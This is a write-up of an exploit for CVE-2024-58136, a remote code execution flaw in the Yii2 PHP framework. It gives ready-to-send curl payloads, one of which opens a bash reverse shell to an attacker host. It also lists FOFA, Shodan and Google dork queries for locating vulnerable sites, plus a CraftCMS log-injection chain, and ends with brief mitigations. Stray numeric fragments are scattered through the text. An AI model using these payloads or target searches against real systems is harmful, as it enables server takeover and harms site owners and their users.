From Behaviors to Shells: Exploiting CVE-2024-58136 in Yii2 PHP Framework
Overview
CVE-2024-58136 is a critical remote code execution (RCE) vulnerability affecting the Yii2 PHP framework. This flaw allows attackers to instantiate arbitrary PHP classes with controlled parameters by exploiting the framework's behavior attachment mechanism, leading to potential RCE.2
Understanding the Vulnerability
388-1Yii2 permits developers to attach behaviors to components using the as <name>
syntax. 388-2When behaviors are defined via JSON input, especially with yii\web\JsonParser
enabled, an attacker can supply a structure like: 9
{
"as hack": {
"__class": "ArbitraryClass",
"class": "ValidBehavior",
"payload": "..."
}
}
653-0In versions prior to 2.0.52, Yii2 checks only the class
key to ensure it subclasses yii\base\Behavior
, but it still instantiates the class specified in __class
. 653-1This oversight allows attackers to execute arbitrary code by leveraging PHP classes with malicious constructors or destructors. 16
Exploitation Techniques
1. Executing phpinfo()
1075-2To test for RCE, an attacker can send a POST request with a payload that triggers phpinfo()
: 20
curl -k -X POST https://target/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}'
1237-0If successful, the response will contain the output of phpinfo()
, confirming code execution. 24
2. Establishing a Reverse Shell
1596-1An attacker can gain a reverse shell by sending a payload that executes a system command: 28
curl -k -X POST https://target/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/attacker_ip/port 0>&1'\''"}}'
1727-0This command initiates a reverse shell connection to the attacker's machine. 32
Target Discovery Methods
FOFA Queries
2138-2To identify potential targets: 36
title="yii" || header="X-Powered-By: Yii"
2225-0Refine by country or port as needed. 40
Shodan Queries
2318-1Search for Yii-powered applications: 44
http.headers:"X-Powered-By: Yii"
2379-0Further refine using known favicon hashes or other headers. 48
Google Dorks
2486-1Utilize specific search queries: 52
intext:"powered by Yii Framework" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of
Advanced Exploitation in CraftCMS
2541-1When CraftCMS (built on Yii2) is in use, attackers can chain vulnerabilities for RCE: 56
Step 1: Log Injection
2802-1Inject a reverse shell payload via a cookie or error page, causing it to be logged. 60
Step 2: Trigger Log-Based LFI
2917-1Use PhpManager
to include the log file containing the payload: 64
{
"as hack": {
"__class": "yii\\rbac\\PhpManager",
"class": "yii\\behaviors\\AttributeBehavior",
"itemFile": "/path/to/log/file.log"
}
}
3021-0This inclusion executes the injected PHP code, resulting in RCE. 68
Mitigation Strategies
Upgrade Yii2: 3257-2Update to version 2.0.52 or later, which addresses this vulnerability. 72
Input Validation: 3383-1Implement strict validation to prevent untrusted JSON inputs from containing keys like __class
, as
, or on
. 76
Web Application Firewall (WAF): 3524-1Deploy a WAF to detect and block malicious payloads targeting this vulnerability. 80
Avoid Raw JSON Parsing: 3648-1Refrain from accepting raw JSON from untrusted sources, especially when using yii\web\JsonParser
. 84
Conclusion
3782-1CVE-2024-58136 poses a significant threat to applications using vulnerable versions of Yii2. 3782-2By understanding the exploitation methods and implementing the recommended mitigations, developers can protect their applications from potential attacks. 91